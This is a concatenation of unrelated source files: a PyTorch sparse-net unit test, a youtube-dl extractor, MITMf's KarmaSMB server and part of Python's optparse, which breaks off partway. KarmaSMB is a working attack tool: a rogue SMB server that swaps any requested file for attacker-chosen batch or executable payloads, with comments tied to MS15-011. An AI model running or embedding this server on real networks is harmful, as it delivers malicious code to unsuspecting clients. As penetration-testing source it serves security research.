# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
#
import unittest
import torch
import torch.nn
from nupic.research.frameworks.pytorch.models.le_sparse_net import LeSparseNet
class LeSparseNetTest(unittest.TestCase):
def test_default(self):
"""
Make sure we get something reasonable with default parameters and
that it runs.
"""
model = LeSparseNet()
x = torch.randn((2,) + (1, 32, 32))
self.assertGreater(len(model._modules), 2)
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
def test_no_cnn(self):
"""Create a net where there are no CNN blocks."""
model = LeSparseNet(
cnn_out_channels=(),
linear_n=(100, 200),
linear_activity_percent_on=(0.1, 1.0),
linear_weight_percent_on=(1.0, 0.4),
)
self.assertGreater(len(model), 2)
for key, _ in model.named_modules():
self.assertFalse("cnn" in key)
# Run some input through it and ensure it doesn't crash
x = torch.randn((2,) + (1, 32, 32))
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
def test_no_linear(self):
"""Create a net where there are no linear blocks."""
model = LeSparseNet(
cnn_out_channels=(8, ),
linear_n=(),
)
self.assertGreater(len(model), 2)
for key, _ in model.named_modules():
self.assertFalse("linear" in key)
# Run some input through it and ensure it doesn't crash
x = torch.randn((2,) + (1, 32, 32))
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
def test_irregular(self):
"""Create a net where different blocks have different sparsities."""
model = LeSparseNet(
cnn_out_channels=(8, 8),
cnn_activity_percent_on=(0.1, 0.2),
cnn_weight_percent_on=(1.0, 0.2),
linear_n=(100, 200),
linear_activity_percent_on=(0.1, 1.0),
linear_weight_percent_on=(1.0, 0.4),
)
self.assertGreater(len(model), 2)
# Run some input through it and ensure it doesn't crash
x = torch.randn((2,) + (1, 32, 32))
y = model(x)
self.assertEqual(y.size()[0], 2)
self.assertEqual(y.size()[1], 10)
if __name__ == "__main__":
unittest.main()
| agpl-3.0 |
kenwang815/KodiPlugins | script.module.youtube.dl/lib/youtube_dl/extractor/keek.py | 105 | 1307 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class KeekIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?keek\.com/keek/(?P<id>\w+)'
IE_NAME = 'keek'
_TEST = {
'url': 'https://www.keek.com/keek/NODfbab',
'md5': '9b0636f8c0f7614afa4ea5e4c6e57e83',
'info_dict': {
'id': 'NODfbab',
'ext': 'mp4',
'title': 'md5:35d42050a3ece241d5ddd7fdcc6fd896',
'uploader': 'ytdl',
'uploader_id': 'eGT5bab',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
return {
'id': video_id,
'url': self._og_search_video_url(webpage),
'ext': 'mp4',
'title': self._og_search_description(webpage).strip(),
'thumbnail': self._og_search_thumbnail(webpage),
'uploader': self._search_regex(
r'data-username=(["\'])(?P<uploader>.+?)\1', webpage,
'uploader', fatal=False, group='uploader'),
'uploader_id': self._search_regex(
r'data-user-id=(["\'])(?P<uploader_id>.+?)\1', webpage,
'uploader id', fatal=False, group='uploader_id'),
}
| gpl-2.0 |
timesking/MITMf | core/servers/KarmaSMB.py | 26 | 26385 | #!/usr/bin/python
# Copyright (c) 2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script w/o a config file the pathname
# file contents will be sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, looks like the client cache is cleared and
# the operation works again. Further research is needed trying
# to avoid this from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from mitmflib.impacket.examples import logger
from mitmflib.impacket import smbserver, smb, version
import mitmflib.impacket.smb3structs as smb2
from mitmflib.impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from mitmflib.impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from mitmflib.impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb_challenge, smb_port, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global', 'challenge', smb_challenge.decode('hex'))
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0', int(smb_port)), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This specially important for
# Windows 7+ and Mavericks clients since they WONT (specially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def start(self):
self.server.serve_forever()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
if line.startswith('#') is not True and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())
| gpl-3.0 |
2014c2g3/cda0512 | static/Brython3.1.1-20150328-091302/Lib/optparse.py | 728 | 60616 | """A powerful, extensible, and easy-to-use option parser.
By Greg Ward <gward@python.net>
Originally distributed as Optik.
For support, use the optik-users@lists.sourceforge.net mailing list
(http://lists.sourceforge.net/lists/listinfo/optik-users).
Simple usage example:
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", dest="filename",
help="write report to FILE", metavar="FILE")
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose", default=True,
help="don't print status messages to stdout")
(options, args) = parser.parse_args()
"""
__version__ = "1.5.3"
__all__ = ['Option',
'make_option',
'SUPPRESS_HELP',
'SUPPRESS_USAGE',
'Values',
'OptionContainer',
'OptionGroup',
'OptionParser',
'HelpFormatter',
'IndentedHelpFormatter',
'TitledHelpFormatter',
'OptParseError',
'OptionError',
'OptionConflictError',
'OptionValueError',
'BadOptionError']
__copyright__ = """
Copyright (c) 2001-2006 Gregory P. Ward. All rights reserved.
Copyright (c) 2002-2006 Python Software Foundation. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the author nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys, os
import textwrap
def _repr(self):
return "<%s at 0x%x: %s>" % (self.__class__.__name__, id(self), self)
# This file was generated from:
# Id: option_parser.py 527 2006-07-23 15:21:30Z greg
# Id: option.py 522 2006-06-11 16:22:03Z gward
# Id: help.py 527 2006-07-23 15:21:30Z greg
# Id: errors.py 509 2006-04-20 00:58:24Z gward
try:
from gettext import gettext, ngettext
except ImportError:
def gettext(message):
return message
def ngettext(singular, plural, n):
if n == 1:
return singular
return plural
_ = gettext
class OptParseError (Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class OptionError (OptParseError):
"""
Raised if an Option instance is created with invalid or
inconsistent arguments.
"""
def __init__(self, msg, option):
self.msg = msg
self.option_id = str(option)
def __str__(self):
if self.option_id:
return "option %s: %s" % (self.option_id, self.msg)
else:
return self.msg
class OptionConflictError (OptionError):
"""
Raised if conflicting options are added to an OptionParser.
"""
class OptionValueError (OptParseError):
"""
Raised if an invalid option value is encountered on the command
line.
"""
class BadOptionError (OptParseError):
"""
Raised if an invalid option is seen on the command line.
"""
def __init__(self, opt_str):
self.opt_str = opt_str
def __str__(self):
return _("no such option: %s") % self.opt_str
class AmbiguousOptionError (BadOptionError):
"""
Raised if an ambiguous option is seen on the command line.
"""
def __init__(self, opt_str, possibilities):
BadOptionError.__init__(self, opt_str)
self.possibilities = possibilities
def __str__(self):
return (_("ambiguous option: %s (%s?)")
% (self.opt_str, ", ".join(self.possibilities)))
class HelpFormatter:
"""
Abstract base class for formatting option help. OptionParser
instances should use one of the HelpFormatter subclasses for
formatting help; by default IndentedHelpFormatter is used.
Instance attributes:
parser : OptionParser
the controlling OptionParser instance
indent_increment : int
the number of columns to indent per nesting level
max_help_position : int
the maximum starting column for option help text
help_position : int
the calculated starting column for option help text;
initially the same as the maximum
width : int
total number of columns for output (pass None to constructor for
this value to be taken from the $COLUMNS environment variable)
level : int
current indentation level
current_indent : int
current indentation level (in columns)
help_width : int
number of columns available for option help text (calculated)
default_tag : str
text to replace with each option's default value, "%default"
by default. Set to false value to disable default value expansion.
option_strings : { Option : str }
maps Option instances to the snippet of help text explaining
the syntax of that option, e.g. "-h, --help" or
"-fFILE, --file=FILE"
_short_opt_fmt : str
format string controlling how short options with values are
printed in help text. Must be either "%s%s" ("-fFILE") or
"%s %s" ("-f FILE"), because those are the two syntaxes that
Optik supports.
_long_opt_fmt : str
similar but for long options; must be either "%s %s" ("--file FILE")
or "%s=%s" ("--file=FILE").
"""
NO_DEFAULT_VALUE = "none"
def __init__(self,
indent_increment,
max_help_position,
width,
short_first):
self.parser = None
self.indent_increment = indent_increment
self.help_position = self.max_help_position = max_help_position
if width is None:
try:
